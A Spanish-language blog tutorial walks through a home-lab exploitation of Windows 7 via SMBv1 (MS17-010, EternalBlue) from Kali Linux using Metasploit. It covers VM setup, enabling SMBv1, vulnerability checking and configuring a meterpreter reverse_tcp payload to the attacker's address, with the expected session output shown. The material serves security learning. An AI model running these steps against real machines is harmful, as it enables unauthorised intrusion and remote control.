Blog Técnico: Cómo Explorar la Vulnerabilidad SMBv1 en Windows 7 desde Kali Linux
Parte 1: Preparación del Laboratorio
Objetivo
Explotar la vulnerabilidad SMBv1 (MS17-010 / EternalBlue) en una máquina con Windows 7 desde una máquina atacante con Kali Linux. Este ejercicio es únicamente con fines educativos y de aprendizaje sobre ciberseguridad defensiva y ofensiva.
1. Instalación del Sistema Operativo
Máquina Víctima: Windows 7
- Descarga: Puedes conseguir una imagen ISO oficial de evaluación desde archive.org o desde tu fuente habitual.
- Requisitos mínimos:
- 2 GB de RAM
- 1 núcleo de CPU
- 30 GB de disco duro
-
Virtualizador sugerido: VirtualBox o VMware.
Configuración básica de red:
- Tipo de red: “Red Interna” o “Adaptador puente” para que ambas máquinas estén en la misma red local.
- Dirección IP fija:
- IP:
192.168.1.119 - Máscara:
255.255.255.0 - Gateway:
192.168.1.1(puedes usar una ficticia si no hay salida a internet) - DNS:
8.8.8.8
- IP:
Activar SMBv1
- En el Panel de Control → "Programas y características" → "Activar o desactivar las características de Windows".
- Marca “Soporte para compartir archivos SMB 1.0/CIFS”.
- Reinicia el sistema.
2. Kali Linux como atacante
Kali Linux
- Asegúrate de tener Kali actualizado (
sudo apt update && sudo apt upgrade) - Dirección IP:
192.168.1.130 - Red: misma configuración que la víctima (puente o red interna)
Herramientas necesarias
nmapmsfconsole(Metasploit)- Exploit:
windows/smb/ms17_010_eternalblue
3. Verificando la vulnerabilidad
Antes de explotar, validamos si la máquina es vulnerable:
- Si el resultado indica “VULNERABLE”, estás listo para el siguiente paso.
Diferencia entre Exploit y Payload
- Exploit: es el código que aprovecha una vulnerabilidad. En este caso,
eternalblueexplota SMBv1. - Payload: es el código que se ejecuta una vez se ha explotado la vulnerabilidad. Por ejemplo: abrir una shell inversa (reverse shell), crear un usuario, etc.
⚠️ Puedes tener éxito con el exploit, pero si el payload falla (por ejemplo, por firewall o configuración), no obtendrás acceso.
Parte 2: Explotación de SMBv1 (EternalBlue) con Metasploit
Requisitos previos (repaso rápido)
- IP víctima (Windows 7):
192.168.1.119 - IP atacante (Kali):
192.168.1.130 - Puerto objetivo en la víctima:
445(SMB) - Kali Linux actualizado y con
msfconsoleinstalado
Paso 1: Abrir Metasploit
En Kali, abre una terminal y ejecuta:
Esto abrirá el entorno interactivo de Metasploit.
Paso 2: Buscar el exploit
Busca el módulo EternalBlue:
Busca esta línea (o similar):
Paso 3: Cargar el módulo
Carga el exploit con:
Verás el prompt cambiar a:
Paso 4: Configurar parámetros del ataque
Configura la dirección IP de la víctima:
Configura tu IP atacante como destino del payload:
Opcionalmente, configura el puerto de escucha:
Paso 5: Elegir un payload
Ahora seleccionas qué quieres ejecutar cuando logres la explotación. Por defecto puedes usar un meterpreter reverse shell:
Si es un Windows 7 de 32 bits, usa:
Paso 6: Verifica los parámetros
Para confirmar la configuración:
Debe mostrar algo como:
LHOST => 192.168.1.130
LPORT => 4444
PAYLOAD => windows/x64/meterpreter/reverse_tcp
Paso 7: Ejecutar el exploit
Ejecuta el ataque con:
O con:
Resultado esperado
Si todo sale bien, deberías ver algo como:
[*] 192.168.1.119:445 - Connecting to target for exploitation.
[*] 192.168.1.119:445 - Target OS selected valid for OS indicated.
...
[*] Meterpreter session 1 opened